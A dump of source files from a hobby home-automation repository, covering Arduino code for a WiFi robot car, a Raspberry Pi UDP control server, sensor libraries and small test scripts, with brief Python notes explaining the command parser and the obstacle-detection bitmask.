esp8266.read();\n Serial.print(\">\");\n while (tmp != -1) {\n Serial.print(tmp);\n tmp = esp8266.read();\n }\n Serial.print(\"\\n\");\n} \n\nboolean connectWiFi()\n{\n sendDebug(\"AT+CWMODE=1\");\n delay(2000);\n String cmd=\"AT+CWJAP=\\\"\";\n cmd+=SSID;\n cmd+=\"\\\",\\\"\";\n cmd+=PASS;\n cmd+=\"\\\"\";\n sendDebug(cmd);\n delay(5000);\n if(esp8266.find(\"OK\")){\n Serial.println(\"RECEIVED: OK\");\n return true;\n }else{\n Serial.println(\"RECEIVED: Error\");\n return false;\n }\n}\n"
},
{
"alpha_fraction": 0.48148149251937866,
"alphanum_fraction": 0.48148149251937866,
"avg_line_length": 27,
"blob_id": "82acec8e216101236006bd82b43c6b6c38e6a58d",
"content_id": "f163ffa7f7983a83daee71976e4b9e4e9451389a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 27,
"license_type": "no_license",
"max_line_length": 27,
"num_lines": 1,
"path": "/WifiCar/SerialProtocol/__init__.py",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "__all__ = ['protocol.py', ]"
},
{
"alpha_fraction": 0.5397219657897949,
"alphanum_fraction": 0.5412115454673767,
"avg_line_length": 33.72413635253906,
"blob_id": "9eab1153a444c34ef675c0cc27f90d7b4fdc90d8",
"content_id": "682f9ce05f7f52a943ef142c7cd8d0d3ab420582",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 4028,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 116,
"path": "/WifiCar/protocol.cpp",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "/*\n*/\n#include \"protocol.h\"\n\n/****************************************************************************/\nvoid send(String a_str) {\n Serial.println(a_str);\n}\n\nCommand::Command(String __str):\n _str(__str), error(\"\")\n{\n int first_separator_index, second_separator_index, end_mark_index;\n String temp_str;\n is_ok = true;\n//send( DebugMsg(\"Command::Command _str=\" + _str).to_s() );\n if (!_str.startsWith(TYPE_COMMAND)) {\n is_ok = false;\n error = _str + \" is not a COMMAND\";\n }\n if (is_ok) { // find the first separator\n first_separator_index = _str.indexOf(SEPARATOR); // it should always be \"CMD:xxxxx\"\n//send( DebugMsg(\"Command::Command first_separator_index=\" + first_separator_index).to_s() );\n if (first_separator_index == -1) {\n // no SEPARATOR found, this is wrong\n is_ok = false;\n error = _str + \" is missing separator\";\n }\n }\n if (is_ok) { // find the end mark\n end_mark_index = _str.indexOf(END_MARK);\n//send( DebugMsg(\"Command::Command end_mark_index=\" + end_mark_index).to_s() );\n if (end_mark_index == -1) {\n // no end mark is found\n is_ok = false;\n error = _str + \" is missing end mark\";\n }\n }\n if (is_ok && end_mark_index <= first_separator_index) {\n // end mark is before the first separator, wrong\n is_ok = false;\n error = _str + \" has end mark before the first separator\";\n }\n if (is_ok) { // find the second separator\n second_separator_index = _str.indexOf(SEPARATOR, first_separator_index + 1);\n//send( DebugMsg(\"Command::Command second_separator_index=\" + second_separator_index).to_s() );\n if (second_separator_index == -1) {\n // not found, then there is only one separator\n second_separator_index = end_mark_index;\n }\n//send( DebugMsg(\"Command::Command end_mark_index=\" + end_mark_index).to_s() );\n//send( DebugMsg(\"Command::Command second_separator_index=\" + second_separator_index).to_s() );\n // get <operation> field\n temp_str = _str.substring(first_separator_index+1, second_separator_index);\n//send( DebugMsg(\"Command::Command temp_str=\" + temp_str).to_s() );\n if (temp_str.length() == 0) {\n // <operation> field is empty\n is_ok = false;\n error = _str + \" has an empty operation field\";\n }\n }\n//send( DebugMsg(\"Command::Command error=\" + error).to_s() );\n if (is_ok) { // decide op_code\n op_str = temp_str;\n//send( DebugMsg(\"Command::Command op_str=\" + op_str).to_s() );\n if (op_str == \"TEMPER\") {\n op_code = OP_CODE_TEMPERATURE;\n } else if (op_str == \"ECHO\") {\n op_code = OP_CODE_ECHO;\n } else if (op_str == \"FORWARD\") {\n op_code = OP_CODE_MOTOR_FORWARD;\n } else if (op_str == \"BACKWARD\") {\n op_code = OP_CODE_MOTOR_BACKWARD;\n } else if (op_str == \"STOP\") {\n op_code = OP_CODE_MOTOR_STOP;\n } else if (op_str == \"SPEEDUP\") {\n op_code = OP_CODE_MOTOR_SPEEDUP;\n } else if (op_str == \"SPEEDDOWN\") {\n op_code = OP_CODE_MOTOR_SPEEDDOWN;\n } else if (op_str == \"TURNLEFT\") {\n op_code = OP_CODE_MOTOR_TURNLEFT;\n } else if (op_str == \"TURNRIGHT\") {\n op_code = OP_CODE_MOTOR_TURNRIGHT;\n } else {\n op_code = OP_CODE_UNKNOWN;\n }\n }\n}\n\nString Command::echo() {\n return Response(STATUS_OK, op_str).to_s();\n}\n\nResponse::Response(int _status, String _msg):\n status(_status), msg(_msg)\n{\n}\n\nString Response::to_s() {\n String status_str;\n switch (status) {\n case STATUS_OK: status_str = \"OK\"; break;\n case STATUS_UNSUPPORTED: status_str = \"NOT_SUPPORTED\"; break;\n default: status_str = String(\"NOK:\");\n }\n return String(\"RSP:\") + status_str + \":\" + msg + 
\";\";\n}\n\nDebugMsg::DebugMsg(String __str):\n _str(__str)\n{\n}\n\nString DebugMsg::to_s() {\n return String(\"DEB:\") + _str + \";\";\n}\n"
},
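Command::Command() walks the "CMD:<operation>[:<args>];" wire format by hand: prefix check, first separator, end mark, then the operation substring, recording an error string at the first violation. Prototyping the same grammar in Python is a quick way to sanity-check messages before they reach the Arduino (separator ":" and end mark ";" are taken from how the parser and Response::to_s() use them; the authoritative values live in protocol.h):

    def parse_command(s, prefix="CMD", sep=":", end=";"):
        # returns (<operation>, "") on success, or (None, error) like Command::error
        if not s.startswith(prefix):
            return None, s + " is not a COMMAND"
        first = s.find(sep)
        if first == -1:
            return None, s + " is missing separator"
        end_mark = s.find(end)
        if end_mark == -1:
            return None, s + " is missing end mark"
        if end_mark <= first:
            return None, s + " has end mark before the first separator"
        second = s.find(sep, first + 1)
        if second == -1:
            second = end_mark            # only one separator: operation runs to the end mark
        op = s[first + 1:second]
        if not op:
            return None, s + " has an empty operation field"
        return op, ""

    # parse_command("CMD:FORWARD;") -> ("FORWARD", "")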
{
"alpha_fraction": 0.6588366627693176,
"alphanum_fraction": 0.68232661485672,
"avg_line_length": 27.838708877563477,
"blob_id": "39637c5af03c48fc8b0934d5155b82c14e93b2d6",
"content_id": "42ad8b1597272efd726974138e06830004a76f55",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 894,
"license_type": "no_license",
"max_line_length": 224,
"num_lines": 31,
"path": "/WifiCar/PiPin.h",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "/*\n Define a digital pin connection with Raspberry Pi.\n*/\n\n#ifndef __PIPIN_H__\n#define __PIPIN_H__\n\n#include <Arduino.h>\n#include \"protocol.h\"\n\nconst byte PIPIN_OP_CODE_MOTOR_STOP = 0x0;\nconst byte PIPIN_OP_CODE_MOTOR_FORWARD = 0x1;\nconst byte PIPIN_OP_CODE_MOTOR_BACKWARD = 0x2;\nconst byte PIPIN_OP_CODE_MOTOR_TURNLEFT = 0x3;\nconst byte PIPIN_OP_CODE_MOTOR_TURNRIGHT = 0x4;\nconst byte PIPIN_OP_CODE_MOTOR_SPEEDUP = 0x5;\nconst byte PIPIN_OP_CODE_MOTOR_SPEEDDOWN = 0x6;\nconst int PIPIN_TO_PROTOCOL_OP_CODES[8] = {OP_CODE_MOTOR_STOP, OP_CODE_MOTOR_FORWARD, OP_CODE_MOTOR_BACKWARD, OP_CODE_MOTOR_TURNLEFT, OP_CODE_MOTOR_TURNRIGHT, OP_CODE_MOTOR_SPEEDUP, OP_CODE_MOTOR_SPEEDDOWN, OP_CODE_UNKNOWN};\n\nclass PiPin\n{\nprivate:\n int in0, in1, in2;\n\npublic:\n PiPin(int _in0, int _in1, int _in2);\n void init(void);\n int read(void);\n};\n\n#endif // __PIPIN_H__\n"
},
{
"alpha_fraction": 0.515999972820282,
"alphanum_fraction": 0.5440000295639038,
"avg_line_length": 26.77777862548828,
"blob_id": "b4b14b5f8c6ce5282a70068d03b810935942bc0c",
"content_id": "f7f4573b4a0319a51ccc43d8f9dc38aa9adc5950",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 250,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 9,
"path": "/WifiCar/echoSerial/echoSerial.py",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\nimport serial\n\nif __name__ == '__main__':\n ser = serial.Serial('/dev/ttyUSB0', 19200)\n while True:\n x = input('--> ')\n ser.write(bytes(x.encode('ascii')))\n print('Nano: ', ser.readline().decode('ascii'))\n"
},
{
"alpha_fraction": 0.5562182664871216,
"alphanum_fraction": 0.566821277141571,
"avg_line_length": 34.92856979370117,
"blob_id": "21d0a8c70ce9097a7382370699d575fa8d2eb30f",
"content_id": "c11fe82069985fedd2cef998e132cbae0eb151ae",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4527,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 126,
"path": "/WifiCar/WifiCar.py",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\nimport logging\nimport argparse\nimport os\nimport socketserver\nfrom time import sleep\nfrom SerialProtocol.protocol import RxCmd, NotRxCmdException\nimport RPi.GPIO as gpio\n\n\"\"\"\nclass Connection:\n TYPES = (SERIAL, ) = range(1)\n def __init__(self, conn_type=SERIAL):\n self.conn_type = conn_type\n if conn_type == Connection.SERIAL:\n if 'windows' in ' '.join(os.uname()).lower():\n self.conn = serial.Serial(port=4, baudrate=19200)\n else:\n self.conn = serial.Serial('/dev/ttyACM0', 19200)\n def send(self, a_str):\n if self.conn_type == Connection.SERIAL:\n self.conn.write(bytes(a_str.encode('ascii')))\n logging.debug(\"Pi->Uno: {}\".format(a_str))\n self.conn.flush()\n def read_char(self):\n c = self.conn.read()\n decoded = False\n while not decoded:\n try:\n c = c.decode('ascii')\n decoded = True\n except UnicodeDecodeError:\n c = self.conn.read()\n return c\n def receive(self):\n line = self.conn.readline()\n decoded = False\n while not decoded:\n try:\n line = line.decode('ascii')\n decoded = True\n except UnicodeDecodeError:\n line = line[1:]\n logging.debug(\"Uno->Pi: {}\".format(line))\n return line\n def readlines(self):\n temp = \"\"\n lines = tuple()\n if self.conn_type == Connection.SERIAL:\n while self.conn.inWaiting() > 0:\n temp += self.conn.read(1)\n decoded_str = \"\"\n for c in temp:\n try:\n decoded_str += c.decode('ascii')\n except UnicodeDecodeError:\n pass\n lines = tuple(decoded_str.split('\\n'))\n for line in lines:\n logging.debug(\"Uno->Pi: {}\".format(line))\n return lines\n\"\"\"\n\nclass PiPin:\n def __init__(self, out_pins):\n '''\n out_pins: a list of GPIO pins for output command.\n\n Note that the pin numbering is the board numbering starting from 1.\n '''\n assert isinstance(out_pins, tuple) or isinstance(out_pins. 
list)\n assert len(out_pins) == 3\n for pin in out_pins:\n assert isinstance(pin, int)\n assert 0 < pin <= 40\n self.out_pins = out_pins\n gpio.setmode(gpio.BOARD)\n for pin in self.out_pins:\n gpio.setup(pin, gpio.OUT)\n gpio.output(pin, False)\n def write(self, value):\n for i in range(len(self.out_pins)):\n gpio.output(self.out_pins[i], value & (1 << i))\n\nHOST = \"0.0.0.0\"\nPORT = 9999\nENCODING = \"ASCII\"\ncount = 0\nclass RaspberryPiHandler(socketserver.BaseRequestHandler):\n \"\"\"\n Handles one incoming datagram.\n \"\"\"\n pipin = PiPin((37, 38, 40))\n action_list = ('STOP', 'FORWARD', 'BACKWARD', 'LEFT', 'RIGHT', 'SPEEDUP', 'SPEEDDOWN')\n def handle(self):\n logging.info(\"On socket({}) received \\\"{}\\\"\".format(self.request[1], self.request[0]))\n logging.debug(\"type(self.request[0])={}\".format(type(self.request[0])))\n datagram = self.request[0].decode(encoding=ENCODING)\n try:\n rx_cmd = RxCmd(datagram)\n except NotRxCmdException:\n logging.warn(\"Received illegal RxCmd: {}\".format(datagram))\n return\n is_done = False\n for i in range(len(RaspberryPiHandler.action_list)):\n if rx_cmd.cmd == RaspberryPiHandler.action_list[i]:\n logging.debug(\"Do {}\".format(rx_cmd.cmd))\n RaspberryPiHandler.pipin.write(i)\n is_done = True\n if not is_done:\n logging.warn(\"Operation unknown: {}\".format(rx_cmd.cmd))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-v\", \"--verbosity\", help=\"verbosity of logging output [0..4]\", action=\"count\", default=0)\n args = parser.parse_args()\n if args.verbosity > 4:\n args.verbosity = 4\n log_lvl = (logging.CRITICAL, logging.ERROR, logging.WARNING, logging.INFO, logging.DEBUG)[args.verbosity]\n logging.basicConfig(level=log_lvl, format='%(filename)s:%(levelname)s:%(message)s')\n logging.info(\"Starting UdpServer instance...\")\n server = socketserver.UDPServer((HOST, PORT), RaspberryPiHandler)\n logging.info(\"UdpServer instance started.\")\n logging.info(\"Let UdpServer to serve forever ...\")\n server.serve_forever()\n"
},
{
"alpha_fraction": 0.6973180174827576,
"alphanum_fraction": 0.6973180174827576,
"avg_line_length": 17.64285659790039,
"blob_id": "d2745b080e1325aee5e53679fc01f5bc77843d2e",
"content_id": "7781f4f3b83b1d5bf651298da072ebc1442a77c2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 261,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 14,
"path": "/elSkateboard/VoltageSensor.cpp",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "#ifndef __VOLTAGE_SENSOR_CPP__\n#define __VOLTAGE_SENSOR_CPP__\n\n#include \"VoltageSensor.h\"\n\nVoltageSensor::VoltageSensor(int _pin):\n pin(_pin){\n}\n\nfloat VoltageSensor::read() {\n return analogRead(pin) * VOLTAGE_RESOLUTION;\n}\n\n#endif // __VOLTAGE_SENSOR_CPP__\n"
},
{
"alpha_fraction": 0.47999998927116394,
"alphanum_fraction": 0.800000011920929,
"avg_line_length": 24,
"blob_id": "c8495a45fcbb6f479aeeb40c68534c5bbaa5fd76",
"content_id": "3df4fc494f29dc2631949c3ea8da57808e556358",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 25,
"license_type": "no_license",
"max_line_length": 24,
"num_lines": 1,
"path": "/lib/WebIOPi/README.txt",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "Downloaded on 2014-12-08\n"
},
{
"alpha_fraction": 0.5041041970252991,
"alphanum_fraction": 0.5235546231269836,
"avg_line_length": 33.592594146728516,
"blob_id": "472955aeef3fb834fc38204bf9236c6c209b2e8f",
"content_id": "bd6d081fbe9ca8a3a915f71a7d2a81a9c3fe720e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 5604,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 162,
"path": "/WifiCar/WifiCar.ino",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "/*\nNeeded components:\n - Arduino Uno (x1)\n - Raspberry Pi (x1)\n - USB power bank (x1)\n - 1.5V AA (x8)\n - 1.5V AA battery shell (holding 4) (x2)\n - step motor (x4)\n - RC car framework (x1)\n - L298N (H-bridge) (x1)\n - InfraRed obstacle sensor (x2)\nConnections:\n - Pi.USB <-> Uno.USB\n*/\n#include \"protocol.h\"\n#include \"PiPin.h\"\n#include \"Motor.h\"\n\n//#define ENABLE_DEBUG\n#include \"debug.h\"\n\nconst char NEW_LINE = 0;\nconst int SERIAL_BAUDRATE = 19200;\n\n/* Uno <-> Pi GPIO connection:\n PIN_A3 <-> Pi_37 (GPIO_26) ## bit 0\n PIN_A4 <-> Pi_38 (GPIO_20) ## bit 1\n PIN_A5 <-> Pi_40 (GPIO_21) ## bit 2\n*/\nPiPin pipin(3, 4, 5);\n\n/* L298N connection:\n enA -> PIN_D10\n in1 -> PIN_D9\n in2 -> PIN_D8\n enB -> PIN_D5\n in3 -> PIN_D7\n in4 -> PIN_D6\n*/\nMotor motor(10, 9, 8, 5, 7, 6);\n\n/* InfraRed obstacle sensor (left) connections:\n VCC <-> 5V\n GND <-> GND\n Out <-> PIN_A0\n\n InfraRed obstacle sensor (left) connections:\n VCC <-> 5V\n GND <-> GND\n Out <-> PIN_A1\n*/\nconst int LEFT_OBS_PIN = 0;\nconst int RIGHT_OBS_PIN = 1;\n\n// internal status for checking obstacles\nconst byte _STATUS_OBS_NONE = 0x0;\nconst byte _STATUS_OBS_LEFT = 0x1;\nconst byte _STATUS_OBS_RIGHT = 0x2;\nconst byte _STATUS_OBS_FRONT = 0x4;\nconst unsigned long FRONT_DIST_THRESHOLD = 200; // try to avoid front crash when obstacle is 200 mm away\nconst int MANOEUVRE_TIME = 400; // ms\n\nvoid setup() {\n Serial.begin(SERIAL_BAUDRATE);\n motor.init();\n pipin.init();\n randomSeed(analogRead(5));\n}\n\nvoid loop() {\n int op_code, motor_status;\n byte obs_status = _STATUS_OBS_NONE;\n op_code = pipin.read();\n switch (op_code) {\n case OP_CODE_MOTOR_FORWARD:\n case OP_CODE_MOTOR_BACKWARD:\n case OP_CODE_MOTOR_STOP:\n case OP_CODE_MOTOR_SPEEDUP:\n case OP_CODE_MOTOR_SPEEDDOWN:\n case OP_CODE_MOTOR_TURNLEFT:\n case OP_CODE_MOTOR_TURNRIGHT: motor.execute(op_code); break;\n case OP_CODE_ECHO: dbg_print(\"ECHO\"); break;\n default: dbg_print(Response(STATUS_UNSUPPORTED, \"\").to_s());\n }\n // manoeuvre to avoid front crash\n motor_status = motor.status;\n obs_status |= !(analogRead(LEFT_OBS_PIN) > 512) ? true: false;\n obs_status |= (!(analogRead(RIGHT_OBS_PIN) > 512) ? 
true: false) << 1;\n obs_status |= ((obs_status&0x1) | ((obs_status>>1)&0x1)) << 2;\n dbg_print(obs_status);\n switch (obs_status) {\n case _STATUS_OBS_LEFT | _STATUS_OBS_RIGHT | _STATUS_OBS_FRONT:\n switch (motor_status) {\n case MOTOR_STATUS_FORWARD:\n motor.backward(); delay(MANOEUVRE_TIME); motor.stop();\n if (random(0, 2) == 0) {\n motor.turnleft(); delay(MANOEUVRE_TIME*2); motor.stop();\n } else {\n motor.turnright(); delay(MANOEUVRE_TIME*2); motor.stop();\n }\n motor.forward(); break;\n case MOTOR_STATUS_LEFT:\n motor.backward(); delay(MANOEUVRE_TIME); motor.turnleft();\n break;\n case MOTOR_STATUS_RIGHT:\n motor.backward(); delay(MANOEUVRE_TIME); motor.turnright();\n break;\n case MOTOR_STATUS_BACKWARD: break;\n case MOTOR_STATUS_STOP: break;\n default: break;\n }\n break;\n case _STATUS_OBS_LEFT | _STATUS_OBS_RIGHT:\n switch (motor_status) {\n case MOTOR_STATUS_FORWARD: break;\n case MOTOR_STATUS_LEFT:\n motor.backward(); delay(MANOEUVRE_TIME); motor.turnleft();\n break;\n case MOTOR_STATUS_RIGHT:\n motor.backward(); delay(MANOEUVRE_TIME); motor.turnright();\n break;\n case MOTOR_STATUS_BACKWARD: break;\n case MOTOR_STATUS_STOP: break;\n default: break;\n }\n break;\n case _STATUS_OBS_LEFT | _STATUS_OBS_FRONT:\n switch (motor_status) {\n case MOTOR_STATUS_FORWARD:\n motor.backward(); delay(MANOEUVRE_TIME); motor.stop();\n motor.turnright(); delay(MANOEUVRE_TIME*2); motor.stop();\n motor.forward(); break;\n case MOTOR_STATUS_LEFT:\n motor.backward(); delay(MANOEUVRE_TIME); motor.turnleft();\n break;\n case MOTOR_STATUS_RIGHT:\n motor.backward(); delay(MANOEUVRE_TIME); motor.turnright();\n break;\n case MOTOR_STATUS_BACKWARD: break;\n case MOTOR_STATUS_STOP: break;\n default: break;\n }\n break;\n case _STATUS_OBS_RIGHT | _STATUS_OBS_FRONT:\n switch (motor_status) {\n case MOTOR_STATUS_FORWARD:\n motor.backward(); delay(MANOEUVRE_TIME); motor.stop();\n motor.turnleft(); delay(MANOEUVRE_TIME*2); motor.stop();\n motor.forward(); break;\n case MOTOR_STATUS_LEFT: break;\n case MOTOR_STATUS_RIGHT: break;\n case MOTOR_STATUS_BACKWARD: break;\n case MOTOR_STATUS_STOP: break;\n default: break;\n }\n break;\n case _STATUS_OBS_LEFT: break;\n case _STATUS_OBS_RIGHT: break;\n case _STATUS_OBS_FRONT: break;\n default: break;\n }\n}\n"
},
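loop() folds the two infrared readings into one status bitmask: left = 0x1, right = 0x2, and a derived front flag 0x4 that is set whenever either side sensor fires, so each switch case names one complete situation. The composition step, spelled out in Python:

    def obstacle_status(left_raw, right_raw, threshold=512):
        # a reading at or below threshold means "obstacle seen",
        # matching the !(analogRead(pin) > 512) tests in loop()
        status = 0x1 if not left_raw > threshold else 0
        status |= (0x2 if not right_raw > threshold else 0)
        # front flag: ((s & 1) | ((s >> 1) & 1)) << 2, i.e. left OR right
        status |= ((status & 0x1) | ((status >> 1) & 0x1)) << 2
        return status

    # obstacle_status(100, 900) -> 0x5 (left + front)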
{
"alpha_fraction": 0.5958858728408813,
"alphanum_fraction": 0.617120087146759,
"avg_line_length": 33.272727966308594,
"blob_id": "1279cc0ca7420d0d2103c73edfa6683e10acccd9",
"content_id": "612626d1dad8b09cf58d377b3955cb05489aad71",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1507,
"license_type": "no_license",
"max_line_length": 130,
"num_lines": 44,
"path": "/lib/PyUdpServer/PyUdpServer.py",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n'''\nAll clients have to follow this format when sending to this server:\n 1. Use UDP\n 2. Port 9999\n 3. each payload format (as a string coded in ASCII):\n ID;type;value\n ID: identity of the sender, e.g. \"kitchen_controller\"\n type: type of the report, e.g. \"temperature\", \"light\", \"infrared\"\n value: integer in unit of 0.001\n Exemples:\n \"frontyard_controller;temperature;-1900\" -> frontyard_controller sent us with temperature of -19.00 degree Celsius\n\n Database:\n Name: pysmarthouse.db\n Database: sqlite3\n Table name: pysmarthouse\n Table format: (Time text, ID text, Type text, Value real)\n'''\nimport socketserver\nimport sqlite3\nimport datetime\n\nclass UDPHandler(socketserver.BaseRequestHandler):\n\n def __init__(self):\n super.__init__(self)\n self.conn = sqlite3.connect(\"./pysmarthouse.db\")\n self.c = self.conn.cursor()\n\n def handle(self):\n data = self.request[0].strip()\n socket = self.request[1]\n #socket.sendto(data.upper(), self.client_address)\n _id, _type, _value = data.split(';')\n _value = float(_value) / 100\n _time = str(datetime.datetime.utcnow())\n self.c.execute(\"INSERT INTO pysmarthouse VALUES (_time, _id, _type, _value)\")\n \n\nif __name__ == \"__main__\":\n HOST, PORT = \"\", 9999 ## all interfaces\n server = socketserver.UDPServer((HOST, PORT), UDPHandler)\n server.serve_forever()"
},
{
"alpha_fraction": 0.7016128897666931,
"alphanum_fraction": 0.7056451439857483,
"avg_line_length": 21.590909957885742,
"blob_id": "12978a1ff4a56f8f594fbb17b24745e253d56e13",
"content_id": "3a06bcdca5d2d56be6a559aae9b748c0ef132fe7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 496,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 22,
"path": "/ArduinoController/bitlashLightSensor.h",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "/*\n Provide bitlash wrap-up of a light sensor instance.\n Light sensor instance has to be:\n 1. named \"lightSensor\";\n 2. exist as global variale\n*/\n\nnumvar lightSensor_get(void)\n{\n return lightSensor.get();\n}\n\nnumvar lightsensor_pin(void)\n{\n return lightSensor.pin();\n}\n\nvoid register_bitlash_lightSensor(void)\n{\n addBitlashFunction(\"lightSensor_get\", (bitlash_function) lightSensor_get);\n addBitlashFunction(\"lightsensor_pin\", (bitlash_function) lightsensor_pin);\n}"
},
{
"alpha_fraction": 0.6666666865348816,
"alphanum_fraction": 0.6747967600822449,
"avg_line_length": 17.636363983154297,
"blob_id": "26c5b77ef9bfcb308b177a89576b1cf429d21257",
"content_id": "c11dccad7fd08ef6805703d238d8228fbb434ee5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 615,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 33,
"path": "/lib/InfraredSensor/InfraredSensor.cpp",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "/*\n Copyright (C) 2014 Michael Duo Ling <[email protected]>\n\n This program is free software; you can redistribute it and/or\n modify it under the terms of the GNU General Public License\n version 2 as published by the Free Software Foundation.\n */\n\n#include \"InfraredSensor.h\"\n\nInfraredSensor::InfraredSensor(unsigned int __pin): _pin(__pin)\n{\n}\n\nvoid InfraredSensor::begin()\n{\n pinMode(_pin, INPUT);\n}\n\nunsigned int InfraredSensor::pin()\n{\n return _pin;\n}\n\nbool InfraredSensor::get()\n{\n if (digitalRead(_pin) == InfraredSensor_ON)\n {\n return InfraredSensor_ON;\n } else {\n return InfraredSensor_OFF;\n }\n}\n"
},
{
"alpha_fraction": 0.6638655662536621,
"alphanum_fraction": 0.7478991746902466,
"avg_line_length": 29,
"blob_id": "6dbce8fe0b05c7613b9fec103d552f397acf884c",
"content_id": "b9641597a11fa18b1b2ba4416c347d59caeedb6e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 119,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 4,
"path": "/lib/OneWire/README.txt",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "From: http://www.pjrc.com/teensy/td_libs_OneWire.html\n\nInteresting sites:\n http://bildr.org/2011/07/ds18b20-arduino/"
},
{
"alpha_fraction": 0.5759096741676331,
"alphanum_fraction": 0.5947302579879761,
"avg_line_length": 24.74193572998047,
"blob_id": "d2d5ef1822260ddadc03c34654564b034aff02a9",
"content_id": "b9fdf44e67c7598d8e7d7ea109ceaa97df8238b4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 797,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 31,
"path": "/WebInterface/python/test/UdpClient.py",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "#!/bin/env python3\n\nimport socket\nimport sys #for exit\n\ntry:\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n s.settimeout(3)\nexcept socket.error:\n print('Failed to create socket')\n sys.exit()\n\nhost = 'localhost';\nport = 9999;\n\nwhile(1) :\n msg = input('Enter message to send : ')\n\n try :\n #Set the whole string\n s.sendto(msg.encode(encoding=\"ASCII\"), (host, port))\n # receive data from client (data, addr)\n d = s.recvfrom(1024)\n reply = d[0]\n addr = d[1]\n print('Server reply : ' + reply.decode(encoding=\"ASCII\"))\n except socket.timeout as msg:\n print(\"No response from server before timeout.\")\n except socket.error as msg:\n print('Error Code : ' + str(msg[0]) + ' Message ' + msg[1])\n sys.exit()"
},
{
"alpha_fraction": 0.453341007232666,
"alphanum_fraction": 0.47734254598617554,
"avg_line_length": 24.15458869934082,
"blob_id": "e25d2dc74817c50d03df7cfda3374f74f9ed37bb",
"content_id": "a8a724ce2e616e412d213f14037b97b98353f00f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 5208,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 207,
"path": "/MiniTempSensor/FourDigitDisplay.cpp",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "/*\n*/\n#include \"FourDigitDisplay.h\"\n\n/****************************************************************************/\n\nFourDigitDisplay::FourDigitDisplay( int _d1, int _d2, int _d3, int _d4,\n int _sA, int _sB, int _sC, int _sD, int _sE, int _sF, int _sG,\n int _dp):\n d1(_d1), d2(_d2), d3(_d3), d4(_d4),\n sA(_sA), sB(_sB), sC(_sC), sD(_sD), sE(_sE), sF(_sF), sG(_sG),\n dp(_dp)\n{\n int i;\n\n // set digital selection pin array\n d_pins[0] = d1; d_pins[1] = d2; d_pins[2] = d3; d_pins[3] = d4;\n min_value = -999;\n max_value = 9999;\n\n // set segment selection pin array\n s_pins[0] = sA; s_pins[1] = sB; s_pins[2] = sC; s_pins[3] = sD;\n s_pins[4] = sE; s_pins[5] = sF; s_pins[6] = sG;\n}\n\nvoid FourDigitDisplay::init() {\n int i;\n for (i=0; i<4; i++) {\n pinMode(d_pins[i], OUTPUT);\n //digitalWrite(d_pins[i], HIGH);\n }\n for (i=0; i<7; i++) {\n pinMode(s_pins[i], OUTPUT);\n //digitalWrite(s_pins[i], LOW);\n }\n pinMode(dp, OUTPUT);\n //digitalWrite(dp, LOW);\n clear();\n}\n\nvoid FourDigitDisplay::select_digit(byte nr) {\n int i;\n switch (nr) {\n case 1:\n case 2:\n case 3:\n case 4:\n for (i=0; i<4; i++) {\n digitalWrite(d_pins[i], HIGH);\n }\n digitalWrite(d_pins[nr-1], LOW);\n }\n}\n\nvoid FourDigitDisplay::digit(byte d, boolean use_dp = false) {\n int i;\n byte pattern;\n if (d < 11) {\n pattern = DISPLAY_PATTERNS[d];\n for (i=0; i<7; i++) {\n digitalWrite(s_pins[i], (pattern >> i) & 1);\n }\n digitalWrite(dp, (pattern >> 7) & 1); // decimal point for out of range pattern\n }\n if (use_dp) {\n digitalWrite(dp, HIGH);\n }\n delayMicroseconds(10);\n}\n\nvoid FourDigitDisplay::clear() {\n int i;\n for 